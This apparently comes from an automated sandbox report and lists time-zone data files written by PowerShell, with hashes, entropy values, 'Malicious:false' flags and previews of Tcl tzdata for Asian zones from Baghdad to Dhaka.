                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Baghdad) {.. {-9223372036854775808 10660 0 LMT}.. {-2524532260 10656 0 BMT}.. {-1641005856 10800 0 +03}.. {389048400 14400 0 +03}.. {402264000 10800 0 +03}.. {417906000 14400 1 +03}.. {433800000 10800 0 +03}.. {449614800 14400 1 +03}.. {465422400 10800 0 +03}.. {481150800 14400 1 +03}.. {496792800 10800 0 +03}.. {512517600 14400 1 +03}.. {528242400 10800 0 +03}.. {543967200 14400 1 +03}.. {559692000 10800 0 +03}.. {575416800 14400 1 +03}.. {591141600 10800 0 +03}.. {606866400 14400 1 +03}.. {622591200 10800 0 +03}.. {638316000 14400 1 +03}.. {654645600 10800 0 +03}.. {670464000 14400 1 +03}.. {686275200 10800 0 +03}.. {702086400 14400 1 +03}.. {717897600 10800 0 +03}.. {733622400 14400 1 +03}.. {749433600 10800 0 +03}.. {765158400 14400 1 +03}.. {780969600 10800 0 +03}.. {796694400 14400 1 +03}.. {812505600 10800 0 +03}.. {82831
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):171
                                                                                                                                                                                                                              Entropy (8bit):4.784355129067593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8hkXHAIgNvZORL/2WFKENUKMFB/4WFKKB:SlSWB9vsM3yBkHAIgPON/2wKENUr/4wT
                                                                                                                                                                                                                              MD5:1B5E0D449DAEF469D586A853CB3073AD
                                                                                                                                                                                                                              SHA1:FD735B0472B31644E787767B82B737CC39EC4175
                                                                                                                                                                                                                              SHA-256:3D437037FBF2BBDF969C8E71967080947F24860D431B39F5D8F23151316ABCD5
                                                                                                                                                                                                                              SHA-512:2A2DC33D4258A5E1AE59172883F3B11723798ED35CF5AF1B8BA81A8807DC6F8222C8044D82B152EF6AF43E7350FEB2625D4406C6C7DD309CE65810EA3D3286B6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Qatar)]} {.. LoadTimeZoneFile Asia/Qatar..}..set TZData(:Asia/Bahrain) $TZData(:Asia/Qatar)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2149
                                                                                                                                                                                                                              Entropy (8bit):3.6155622322573713
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5/eFdqlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPBUTIEjvZJ+76:5RsUf8mFpNWFny1ZGMte3aivUKo
                                                                                                                                                                                                                              MD5:294DFC98F67AC00A188EC3D3B87C501C
                                                                                                                                                                                                                              SHA1:93C434CD9AA170E35AD676C88EE09986A94EC02A
                                                                                                                                                                                                                              SHA-256:873E8F08B87610D0DAFE239D32345248A4595C6B13D1DA83EC214D78E88FA12C
                                                                                                                                                                                                                              SHA-512:5346082CCA733724C0D2C36B768467E59BA9ED6452B6CF1BA923AF4F0D2BC05C67DB49E804CA81DAD449D30D0835026D708D9AB632D02FDA1EA1A0BF717111DE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Baku) {.. {-9223372036854775808 11964 0 LMT}.. {-1441163964 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {701823600 14400 1 +03}.. {717548400 14400 0 +04}.. {820440000 14400 0 +04}.. {828234000 18000 1 +05}.. {846378000 14400 0 +04}.. {852062400
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.911309754748998
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKELYOiMXGm2OHB+keoHvZKmrROpDovFFsQ+8EXVeVSYe:SlSWB9eg/2wKELeDm2OHxeoHvZ3FO1og
                                                                                                                                                                                                                              MD5:9AC4947AC29C797055B7EBFA4F6AC710
                                                                                                                                                                                                                              SHA1:E7758A9A8BFA255F6B2D27F5366D9FE2A26DDF6C
                                                                                                                                                                                                                              SHA-256:6E72BA908F250FD45D554A12E3E7B3BD2F1C02A6C2431F806FD2A054F843AA90
                                                                                                                                                                                                                              SHA-512:F9D0F0CB7D3726C2AB3B5049429172D9DD4BA21353F6F98570CBA4EE969F7D97BD973CB165AECFF930AFFA8633E8052624D44EE7FB91763681ED3F78A61F4F98
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Bangkok) {.. {-9223372036854775808 24124 0 LMT}.. {-2840164924 24124 0 BMT}.. {-1570084924 25200 0 +07}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2117
                                                                                                                                                                                                                              Entropy (8bit):3.7025684250364725
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5VeTtXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEnsr:5n40yVRB7VfXucdKmtTTDOV
                                                                                                                                                                                                                              MD5:6CC13B6910412A3A3D16CA36ADF00352
                                                                                                                                                                                                                              SHA1:061CF4A8FEA8C139F50F96E6B6506B50ED3DD792
                                                                                                                                                                                                                              SHA-256:992F93A7975F8CD4E94D96B3BA1ECFB3585E52A53F4442A15993402D3F955F66
                                                                                                                                                                                                                              SHA-512:4E9750B1C3C0BA4F7922BCBC76276A3E74031D78A98E21DC59F66D6EA8E1B70865BBEB50A6B77EB0423421A18428B97B47412053CE15213128CEED669F4DD6E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Barnaul) {.. {-9223372036854775808 20100 0 LMT}.. {-1579844100 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {76470
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8024
                                                                                                                                                                                                                              Entropy (8bit):3.7230911686481774
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:4nBKPP8LFH0TDkywaZb1QSCK5VUjiO1PoBQpo7778CZicJZS80EGcLt4Mok1MgJl:4M38LCRZb+sAiO1PoBQpo1ikjD
                                                                                                                                                                                                                              MD5:1D99E2BBB01B1669403CFBAF7E03F733
                                                                                                                                                                                                                              SHA1:DBDD58C7FD195FC602C4541D6F416CC96094C121
                                                                                                                                                                                                                              SHA-256:17AF14646D562AFE17DCCFD1D2FBA95C122F3E0263906A36EB48BFF04ACF233E
                                                                                                                                                                                                                              SHA-512:98524E8DCD17C090058F17BDA1200D9801EB1B14EB5CEB8C31149A4A402A53BA4923A2AFF457E0A72DAA601D88095247806F945F704000F874FCBF73631DD135
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Beirut) {.. {-9223372036854775808 8520 0 LMT}.. {-2840149320 7200 0 EET}.. {-1570413600 10800 1 EEST}.. {-1552186800 7200 0 EET}.. {-1538359200 10800 1 EEST}.. {-1522551600 7200 0 EET}.. {-1507514400 10800 1 EEST}.. {-1490583600 7200 0 EET}.. {-1473645600 10800 1 EEST}.. {-1460948400 7200 0 EET}.. {-399866400 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336794400 10800 1 EEST}.. {-323578800 7200 0 EET}.. {-305172000 10800 1 EEST}.. {-291956400 7200 0 EET}.. {-273636000 10800 1 EEST}.. {-260420400 7200 0 EET}.. {78012000 10800 1 EEST}.. {86734800 7200 0 EET}.. {105055200 10800 1 EEST}.. {118270800 7200 0 EET}.. {136591200 10800 1 EEST}.. {149806800 7200 0 EET}.. {168127200 10800 1 EEST}.. {181342800 7200 0 EET}.. {199749600 10800 1 EEST}.. {212965200 7200 0 EET}.. {231285600 10800
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1669
                                                                                                                                                                                                                              Entropy (8bit):3.7443715330695735
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5qvdJqxiF0rvK5XvV4vUzvCjvT7voPvkPvJUbvn0vYpv99v3uvuWvKJhv3T:Ad1mzK5/VkULCbTjoHkHJUDnQYV9p3mO
                                                                                                                                                                                                                              MD5:1EE8FF3DF0D931A140ADBB021EB3BFEB
                                                                                                                                                                                                                              SHA1:F1F15EF70C4E9F456849AF89CAC97AD747D9E192
                                                                                                                                                                                                                              SHA-256:1D5E9A8F6A04273AF741F648EF10718B004A60D7884FE432DDF85A8F558BEA98
                                                                                                                                                                                                                              SHA-512:155539A5CF21A34FBFACBF1652D934BF32255F4E505E60B3B4D8B5F2F7FAE552E6CB4824D8608A9C56370F58E48702335995BBD16B7A296A86A72A615FBC8ABC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Bishkek) {.. {-9223372036854775808 17904 0 LMT}.. {-1441169904 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {683586000 18000 0 +05}.. {703018800 21600 1 +05}.. {717530400 18000 0 +05}.. {734468400 21600 1 +05}.. {748980000 18000 0 +05}.. {765918000 21600 1 +05}.. {78042
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.949517569857329
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8kLP/vXHAIgN16L1RL/2WFKXeAMM7QWFKPLPyn:SlSWB9vsM3yELPHAIg+L1N/2wK0oQwKW
                                                                                                                                                                                                                              MD5:716D842F23974137C5E07A1A65CEFC5D
                                                                                                                                                                                                                              SHA1:C7248C9DBD6AE5AF33BD4B3602D17737EBE023A0
                                                                                                                                                                                                                              SHA-256:F3110E9DD514E3654A9DE777E22B2D2391692927954B4B7E42ED54AB665C3CF5
                                                                                                                                                                                                                              SHA-512:4EC012EAABE60728D9447EEDF4BA7B16CA82786AA39EE79B2F9B32F227F9816FCE42F173153261F9AF88A12209752E84EBD7170C54D126C2DBB1ED3A8D069668
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Kuching)]} {.. LoadTimeZoneFile Asia/Kuching..}..set TZData(:Asia/Brunei) $TZData(:Asia/Kuching)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.774027471796823
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq864DyXHAIgN1QvRL/2WFKh0s+WFKvovn:SlSWB9vsM3ya4DSHAIgcvN/2wKN+wKvy
                                                                                                                                                                                                                              MD5:8BB098AB77CB0469B1FA0E0B64C4A9E7
                                                                                                                                                                                                                              SHA1:88C73626985071DD0923E1CAB343ACCD854A7297
                                                                                                                                                                                                                              SHA-256:1BAEF7850111D2C33B2A766A8AE804534ABA1711BF80A4087A89656DDD8469D5
                                                                                                                                                                                                                              SHA-512:82216A7F787AF20A4C97C7AA754CD6BE979FEF24137CF9A8B18EECA5E8FBCF12834DD8A6FC9CD2357D807F1629806745B46B11DC0472E0284E18DCCC983897DE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Kolkata)]} {.. LoadTimeZoneFile Asia/Kolkata..}..set TZData(:Asia/Calcutta) $TZData(:Asia/Kolkata)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2086
                                                                                                                                                                                                                              Entropy (8bit):3.6981807774781017
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5Bpr1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFY7rRWjYuhUmgr2M:95PhtjLiII2ZFlgd
                                                                                                                                                                                                                              MD5:69E03A5CEB689E19B60168C0F7EBAE8E
                                                                                                                                                                                                                              SHA1:95C6396EB753753B4FE4AE1B98D76332523E72A4
                                                                                                                                                                                                                              SHA-256:10B6F435B05D887176A4D90CA5AC957F327F62F36F15D6F6E4F81844662429B9
                                                                                                                                                                                                                              SHA-512:DFA72EDC54A11F0840ADBEE7F5AD8EA472AA52A1F196292F1341CD92A68FB2EC0A5BC7DE6C8E83C975420DB4B76CECD4393370FDB2C09F86EC11A50E540F6F02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Chita) {.. {-9223372036854775808 27232 0 LMT}.. {-1579419232 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {7647012
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1619
                                                                                                                                                                                                                              Entropy (8bit):3.775783980828041
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5th5fSW2sp4Qh2rRSQnGw7GywvWbC25XrMYWG4AIQTUhp9pkTGdXguHaena44XY5:rh5kpmWG29QFUmD
                                                                                                                                                                                                                              MD5:540A7304A62ABB8D7F84454ABD6E2556
                                                                                                                                                                                                                              SHA1:52C37529929218A668D7A4AD6FD1B5FE0A727E16
                                                                                                                                                                                                                              SHA-256:94B2C14EF45C695EF6B19D94722E1BCBB629A595F2866DBA80F00A66721040B5
                                                                                                                                                                                                                              SHA-512:3B535D109DB369E301D6B412F21EC990976B997826F22B2E16ECEEEB048D60F064C7CA1A616393DC2F1B491BAC0548DC0965B9EA149A95280FFDBCAD6726EF0F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Choibalsan) {.. {-9223372036854775808 27480 0 LMT}.. {-2032933080 25200 0 +07}.. {252435600 28800 0 +08}.. {417974400 36000 0 +09}.. {433778400 32400 0 +09}.. {449593200 36000 1 +09}.. {465314400 32400 0 +09}.. {481042800 36000 1 +09}.. {496764000 32400 0 +09}.. {512492400 36000 1 +09}.. {528213600 32400 0 +09}.. {543942000 36000 1 +09}.. {559663200 32400 0 +09}.. {575391600 36000 1 +09}.. {591112800 32400 0 +09}.. {606841200 36000 1 +09}.. {622562400 32400 0 +09}.. {638290800 36000 1 +09}.. {654616800 32400 0 +09}.. {670345200 36000 1 +09}.. {686066400 32400 0 +09}.. {701794800 36000 1 +09}.. {717516000 32400 0 +09}.. {733244400 36000 1 +09}.. {748965600 32400 0 +09}.. {764694000 36000 1 +09}.. {780415200 32400 0 +09}.. {796143600 36000 1 +09}.. {811864800 32400 0 +09}.. {828198000 36000 1 +09}.. {843919200 32400 0 +09}.. {8596
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.865222436335267
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/2WFKh2V7/4WFKdy:SlSWB9vsM3yMPHAIgO8AN/2wKho4wKU
                                                                                                                                                                                                                              MD5:C5DC40C6325391F7247251ADB2C07F78
                                                                                                                                                                                                                              SHA1:3DDB1BF94532FB1F1271095B9C8CAA779BC545EF
                                                                                                                                                                                                                              SHA-256:A87382DC5F3C3141547A65E3746AF1DAF94B51468B96DA6CEF30E95754C97D37
                                                                                                                                                                                                                              SHA-512:062FF8D5E5392E5372B0405EDF3C7CF997AC33F95EBFFAA9CC9AB82BBE27B60C80255FCCEE9E6F5E02CBFCB163F99984BB2103217FFD1F80BDEC5C684BF2F61A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:Asia/Chongqing) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.889115378893491
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/2WFK7LeL9J4WFKdy:SlSWB9vsM3yMPHAIgO8AN/2wK7LUT4wj
                                                                                                                                                                                                                              MD5:C3676771EB813B346F58A7B574D0D7B5
                                                                                                                                                                                                                              SHA1:A473EF621309E019F29F3DEF95C38593775B8404
                                                                                                                                                                                                                              SHA-256:D6D2B4A761C547F1F853AE901AC71AB49FBE825037079C4E0C89DC940AE4A822
                                                                                                                                                                                                                              SHA-512:21C3A5D499E6E0427FBF585CA8CC5D99D193C586483AB107C4D8E9F9DC8412021E8E019A314757DAFE1225D2635F6D48E9C54A511709863F22A02449FA201E02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:Asia/Chungking) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):369
                                                                                                                                                                                                                              Entropy (8bit):4.465596050904646
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKr+iDm2OHgoHvZv9tdvjSWV/FSQipPUrKkTD/k5QqRVVFSQOR/UIp:MB862zZmdHgCvZvJvj1Nj+Phkv/YtvjA
                                                                                                                                                                                                                              MD5:9541BB43E79AB0C6E8163945B5BFB1BF
                                                                                                                                                                                                                              SHA1:C4994420DB8313DECDE19B4B9F6C5DB0126A95A7
                                                                                                                                                                                                                              SHA-256:E5B5E6D607A15DA65CB00C92C35A63EAF25F547E64CB34BB419CB8CFC2714B1B
                                                                                                                                                                                                                              SHA-512:46F623B3F7CF8A50F97DD812521398EB9100C9CDFB967C18EF1BD112306AAEB3C9CB224424E48611CB8CC21D1DC3D820DD83032D12BC9DF19301CF07786FA664
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Colombo) {.. {-9223372036854775808 19164 0 LMT}.. {-2840159964 19172 0 MMT}.. {-2019705572 19800 0 +0530}.. {-883287000 21600 1 +06}.. {-862639200 23400 1 +0630}.. {-764051400 19800 0 +0530}.. {832962600 23400 0 +0630}.. {846266400 21600 0 +06}.. {1145039400 19800 0 +0530}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):169
                                                                                                                                                                                                                              Entropy (8bit):4.786111096226559
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8ntyXHAIgN6KyFvRL/2WFK1S2WFKwBn:SlSWB9vsM3yHtSHAIgMKON/2wKM2wKwB
                                                                                                                                                                                                                              MD5:BA575D37459540907A644438071277F8
                                                                                                                                                                                                                              SHA1:14CF10D6AABBAF7BAE42B3B9641D8469C206567F
                                                                                                                                                                                                                              SHA-256:B3AD560F66EA330E54A147017E6E6AB64452A5255D097B962D540836D7B19EE7
                                                                                                                                                                                                                              SHA-512:9CA386EF4D812B00C2E63558B81B273F92BBCA98AF304C9FD6FC166210FC4E2F92B769E1D6FB96B670650DC76EFFAD2FC6E39AE12C24B47EAED4E50A2AFAC2D7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Dhaka)]} {.. LoadTimeZoneFile Asia/Dhaka..}..set TZData(:Asia/Dacca) $TZData(:Asia/Dhaka)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3692
                                                                                                                                                                                                                              Entropy (8bit):3.7832279883701254
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:59xu6+RYla5W87rtYV08a7bd+dYV004X7JkX3Q0dzPeP2ua/XAog7jP/xZsNaTvT:8YI5WpVAdVGlkBOLh8X0CkBheIFlR
                                                                                                                                                                                                                              MD5:1D6B2CC38669C0F7378D9A576F10C477
                                                                                                                                                                                                                              SHA1:09A31E6295D9FC39219DFA4FC598B46F55C41180
                                                                                                                                                                                                                              SHA-256:7E577F0F9DA459BA1A325BE95C1FA0DB2C6ECFC1D64CDB73F3ADB09588293BA7
                                                                                                                                                                                                                              SHA-512:A0BBD5CE7883C275BF9752C75BA0C9AF0181046D94D27EFC96EC8823C374BADCB69B2B11D2C4497295E5BC25D5790634C69C6E7185F406F2107A8E16044E670F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Damascus) {.. {-9223372036854775808 8712 0 LMT}.. {-1577931912 7200 0 EET}.. {-1568592000 10800 1 EEST}.. {-1554080400 7200 0 EET}.. {-1537142400 10800 1 EEST}.. {-1522630800 7200 0 EET}.. {-1505692800 10800 1 EEST}.. {-1491181200 7200 0 EET}.. {-1474243200 10800 1 EEST}.. {-1459126800 7200 0 EET}.. {-242265600 10800 1 EEST}.. {-228877200 7200 0 EET}.. {-210556800 10800 1 EEST}.. {-197427600 7200 0 EET}.. {-178934400 10800 1 EEST}.. {-165718800 7200 0 EET}.. {-147398400 10800 1 EEST}.. {-134269200 7200 0 EET}.. {-116467200 10800 1 EEST}.. {-102646800 7200 0 EET}.. {-84326400 10800 1 EEST}.. {-71110800 7200 0 EET}.. {-52704000 10800 1 EEST}.. {-39488400 7200 0 EET}.. {-21168000 10800 1 EEST}.. {-7952400 7200 0 EET}.. {10368000 10800 1 EEST}.. {23583600 7200 0 EET}.. {41904000 10800 1 EEST}.. {55119600 7200 0 EET}.. {73526400 10800 1
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):364
                                                                                                                                                                                                                              Entropy (8bit):4.412125512631861
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKwiDm2OHEmVFnoHv9vX+Yl7UIFckVVFSQiL/FG/UIvy/Ur9i/Ur97:MB862Y2mdHzdCv9P+Y9vvjeQlP9/9VkK
                                                                                                                                                                                                                              MD5:B5496A038AC230B9D75AA22BB2BE6BDD
                                                                                                                                                                                                                              SHA1:ACFD9C78F803F344272E8E188C41ED969EBADA16
                                                                                                                                                                                                                              SHA-256:BFC4562055CC4355E79F9EFAA580A4C6A658285916159A5D390A0CDA96A97E98
                                                                                                                                                                                                                              SHA-512:AB05D0176DADC1ED03CC526C372B9827A5FA03459E4F4B4365C6CE4B6FBDA043514A9D3FE2DA747159C5A1BC0E07727E6578A101E42B4DB120AF9624368C5FEA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dhaka) {.. {-9223372036854775808 21700 0 LMT}.. {-2524543300 21200 0 HMT}.. {-891582800 23400 0 +0630}.. {-872058600 19800 0 +0530}.. {-862637400 23400 0 +0630}.. {-576138600 21600 0 +06}.. {1230746400 21600 0 +06}.. {1245430800 25200 1 +06}.. {1262278800 21600 0 +06}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):235
                                                                                                                                                                                                                              Entropy (8bit):4.597480383845617
                                                                                                                                                                                                                              Encrypted:false
